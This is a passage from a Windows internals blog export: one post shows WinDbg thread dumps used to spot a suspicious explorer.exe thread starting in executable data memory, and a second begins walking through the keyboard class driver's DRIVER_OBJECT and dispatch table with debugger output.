nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b1f4ad64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0239fcb4 7c90eae3 ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0239fcc8 77d493f5 ntdll!KiUserCallbackDispatcher+0x13 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0239ff28 75faea19 USER32!NtUserWaitMessage+0xc<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0239ffb4 7c80b50b BROWSEUI!BrowserProtectedThreadProc+0x44 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0239ffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> THREAD 821b4788 Cid 0594.07d0 Teb: 7ffa6000 Win32Thread: e32efc00 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 824bf510 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 8211b150 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> IRP List:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 82829d38: (0006,01b4) Flags: 00000000 Mdl: 00000000<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696274 Ticks: 519 (0:00:00:08.109)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 14267 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:06.234<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:13.843<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address BROWSEUI!BrowserProtectedThreadProc (0x75fae9d5)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b1f2ac80 Current b1f2a5dc Base b1f2b000 Limit b1f25000 <span style="color: #0000ff">Call</span> b1f2ac80<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Priority 10 BasePriority 8 PriorityDecrement 0 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f2a5f4 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b1f2a600 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f2a638 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b1f2a9c8 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f2a9c8 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b1f2a9e4)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0219fb48 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0219fb4c 7c8094f2 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0219fbe8 77d4bbfe kernel32!WaitForMultipleObjectsEx+0x12c (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0219fc44 6c1e4b92 USER32!RealMsgWaitForMultipleObjectsEx+0x13e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0219fc64 6c1e4cfd DUSER!CoreSC::Wait+0x3a (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0219fc88 6c1e4ef9 DUSER!CoreSC::WaitMessage+0x40 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0219fc98 77d88a2c DUSER!MphWaitMessageEx+0x22 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0219fcb4 7c90eae3 USER32!__ClientWaitMessageExMPH+0x1e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0219fcb4 804feb6c ntdll!KiUserCallbackDispatcher+0x13 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f2ac98 80595bbf nt!KiCallUserMode+0x4 (FPO: [2,3,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b1f2acf4 bf92a862 nt!KeUserModeCallback+0x87 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">WARNING: Frame IP <span style="color: #0000ff">not</span> <span style="color: #0000ff">in</span> any known module. Following frames may be wrong.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b1f2ad5c 8053c808 0xbf92a862<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b1f2ad5c 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b1f2ad64)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0219fcb4 7c90eae3 ntdll!KiFastSystemCallRet (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0219fcc8 77d493f5 ntdll!KiUserCallbackDispatcher+0x13 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0219ff28 75faea19 USER32!NtUserWaitMessage+0xc<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 0219ffb4 7c80b50b BROWSEUI!BrowserProtectedThreadProc+0x44 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 0219ffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> THREAD 8222eba0 Cid 0594.0218 Teb: 7ffd5000 Win32Thread: e166b8c0 WAIT: (UserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> </pre></pre><br /><p>Here are few of the thread’s base addree from list</p><br /><p> THREAD 828f02a0 Cid 0594.06d4 Teb: 7ffa8000 Win32Thread: 00000000 WAIT: (UserRequest) UserMode <br /><p>Non-Alertable<br> 827acd28 NotificationEvent<br> 823a7220 SynchronizationEvent<br> Not impersonating<br> DeviceMap e1cba0b0<br> Owning Process 827f9020 Image: explorer.exe<br> Attached Process N/A Image: N/A<br> Wait Start TickCount 696151 Ticks: 642 (0:00:00:10.031)<br> Context Switch Count 17 <br> UserTime 00:00:00.000<br> KernelTime 00:00:00.000<br> Win32 Start Address 0x02476cf6<br /><p> <p>If you see the address 0x02476cf6 (02470000) for exploere.exe in VMMAP tool you can see the the address lies in a data region and has execute permission which raises the suspicion.<br /><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhocG6MaGfLldUSE8QMv0H4cr3l2Wh0KoR8mUrBJAEHjWezC5mre9aibYe2JRveuQ0p-2YigHpJWnRG42qGUukf8JCgJ0u5ZrwDhNQFvI33MsjFMHhn_OPAaU3h4Sx9SaE8v-eNKUo3Ttfk/s1600-h/image%25255B7%25255D.png"><img title="image" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="77" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxbKZIuXog0ZlLBwcPVQFLriFzmP380aYDw4WCQWl1SmmwmzyuuWSuJ6DbVI9bpl7kkD72DfGOZ_YnFtZH9kl83HJkFaTm4GybApO9_4qvXiPBuJg9hHrOeRtCdyjUSDx3fx1Z9zQGyd2p//?imgmax=800" width="657" border="0"></a> <br /><p> <p>So we need to check address ranges of different threads base address.<br /><p>There can be lots of easier and accurate ways. This is one of the ways I make out.<br /><p>References:<br /><p><a title="http://blogs.technet.com/b/markrussinovich/archive/2011/03/30/3416253.aspx" href="http://blogs.technet.com/b/markrussinovich/archive/2011/03/30/3416253.aspx">http://blogs.technet.com/b/markrussinovich/archive/2011/03/30/3416253.aspx</a><br /><p><a title="http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf" href="http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf">http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf</a> abhijit mohantahttp://www.blogger.com/profile/07873328015433467380noreply@blogger.com0tag:blogger.com,1999:blog-9205939188428310956.post-61181106557916850532011-10-23T06:53:00.001-07:002011-10-23T07:12:42.993-07:00Enumerating a DRIVER_OBJECT using Driver Code<p> </p> <p>A Driver Object has the Following structure.</p><pre>typedef struct _DRIVER_OBJECT<br />{<br /> SHORT Type;<br /> SHORT Size;<br /> <a href="http://www.nirsoft.net/kernel_struct/vista/DEVICE_OBJECT.html">PDEVICE_OBJECT</a> DeviceObject;<br /> ULONG Flags;<br /> PVOID DriverStart;<br /> ULONG DriverSize;<br /> PVOID DriverSection;<br /> <a href="http://www.nirsoft.net/kernel_struct/vista/DRIVER_EXTENSION.html">PDRIVER_EXTENSION</a> DriverExtension;<br /> <a href="http://www.nirsoft.net/kernel_struct/vista/UNICODE_STRING.html">UNICODE_STRING</a> DriverName;<br /> <a href="http://www.nirsoft.net/kernel_struct/vista/UNICODE_STRING.html">PUNICODE_STRING</a> HardwareDatabase;<br /> <a href="http://www.nirsoft.net/kernel_struct/vista/FAST_IO_DISPATCH.html">PFAST_IO_DISPATCH</a> FastIoDispatch;<br /> LONG * DriverInit;<br /> PVOID DriverStartIo;<br /> PVOID DriverUnload;<br /> LONG * MajorFunction[28];<br />} DRIVER_OBJECT, *PDRIVER_OBJECT;</pre><br /><p>Looking at a driver in DeviceTree utility </p><br /><p>Following is the Driver related to keyboard</p><br /><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHK4Dfx4TGjxjGTcR06Er3Vc47ls-zlb9B1VKpMGBVfBGv3IPqQIxOrUgB03q8Zx_oKVybYvb5EMzpGZffvbMSyWqmTPVIPz8SDFcQbnb2_nk3OM-jVdh0-1HgrowkcZGBr87SeLO79KhT/s1600-h/image%25255B8%25255D.png"><img title="image" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="148" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidEcK5rpjrT6OdnQ2dZ7EoVaPumQoKUL46uzZO_XB8bPAJf6zRUC0rieJHXK_OJe6npjDpDWhC8IMn3Ebf1fEajL5sGkqoEqjqVCKh8xodv1-SToAnb04VzJXxIiuBGrrYI1b6GddvEDSy//?imgmax=800" width="510" border="0"></a> </p><br /><p>Using Windbg we can see the Structure of the Driver.</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 507px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 85px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">kd> !drvobj kbdclass<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Driver object (8186aae8) <span style="color: #0000ff">is</span> <span style="color: #0000ff">for</span>:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> \Driver\Kbdclass<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Driver Extension List: (id , addr)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Device Object list:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">81798a58 81864860 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre></pre><br /><p>Lets see the DevObject at 81864860</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 510px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 101px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">kd> !devobj 81864860 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Device object (81864860) <span style="color: #0000ff">is</span> <span style="color: #0000ff">for</span>:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> KeyboardClass0 \Driver\Kbdclass DriverObject 8186aae8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Current Irp 00000000 RefCount 1 Type 0000000b Flags 00002044</pre></pre><br /><p>Now lets see the DriverObject at 8186aae8 which is KeyboardClass0</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 513px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 99px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">kd> !drvobj 8186AAE8 7<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Driver object (8186aae8) <span style="color: #0000ff">is</span> <span style="color: #0000ff">for</span>:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> \Driver\Kbdclass<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Driver Extension List: (id , addr)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Device Object list:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">81798a58 81864860 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">DriverEntry: f9cb0610 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">DriverStartIo: 00000000 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">DriverUnload: 00000000 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">AddDevice: f9cafb02 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Dispatch routines:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[00] IRP_MJ_CREATE f9cacdd8 +0xf9cacdd8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[01] IRP_MJ_CREATE_NAMED_PIPE 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[02] IRP_MJ_CLOSE f9cacfe8 +0xf9cacfe8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[03] IRP_MJ_READ f9cadc82 +0xf9cadc82<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[04] IRP_MJ_WRITE 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[05] IRP_MJ_QUERY_INFORMATION 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[06] IRP_MJ_SET_INFORMATION 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[07] IRP_MJ_QUERY_EA 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[08] IRP_MJ_SET_EA 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[09] IRP_MJ_FLUSH_BUFFERS f9cacd50 +0xf9cacd50<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[0a] IRP_MJ_QUERY_VOLUME_INFORMATION 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[0b] IRP_MJ_SET_VOLUME_INFORMATION 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[0c] IRP_MJ_DIRECTORY_CONTROL 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[0d] IRP_MJ_FILE_SYSTEM_CONTROL 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[0e] IRP_MJ_DEVICE_CONTROL f9caea44 +0xf9caea44<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[0f] IRP_MJ_INTERNAL_DEVICE_CONTROL f9cae386 +0xf9cae386<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[10] IRP_MJ_SHUTDOWN 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[11] IRP_MJ_LOCK_CONTROL 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[12] IRP_MJ_CLEANUP f9cacd0c +0xf9cacd0c<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[13] IRP_MJ_CREATE_MAILSLOT 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[14] IRP_MJ_QUERY_SECURITY 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[15] IRP_MJ_SET_SECURITY 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[16] IRP_MJ_POWER f9caf196 +0xf9caf196<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[17] IRP_MJ_SYSTEM_CONTROL f9cae844 +0xf9cae844<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[18] IRP_MJ_DEVICE_CHANGE 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[19] IRP_MJ_QUERY_QUOTA 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">[1a] IRP_MJ_SET_QUOTA 804f320e nt!IopInvalidDeviceRequest<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">[1b] IRP_MJ_PNP f9cad798 +0xf9cad798</pre></pre><br /><p>Now lets write a kernel mode driver code to do the same thing</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 511px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 136px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #008000">/*<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">kd> !drvobj kbdclass<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Driver object (8186aae8) is for:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> \Driver\Kbdclass<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Driver Extension List: (id , addr)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Device Object list:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">81798a58 81864860 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">kd> !devobj 81864860 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Device object (81864860) is for:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KeyboardClass0 \Driver\Kbdclass DriverObject 8186aae8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Current Irp 00000000 RefCount 1 Type 0000000b Flags 00002044<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Dacl e13ae02c DevExt 81864918 DevObjExt 818649f8 <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">ExtensionFlags (0000000000) <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">AttachedTo (Lower) 81864a58*** ERROR: Module load completed but symbols could not be loaded for nmfilter.sys<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> \Driver\nmfilter<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Device queue is not busy.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">kd> !drvobj 8186AAE8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">Driver object (8186aae8) is for:<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> \Driver\Kbdclass<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier 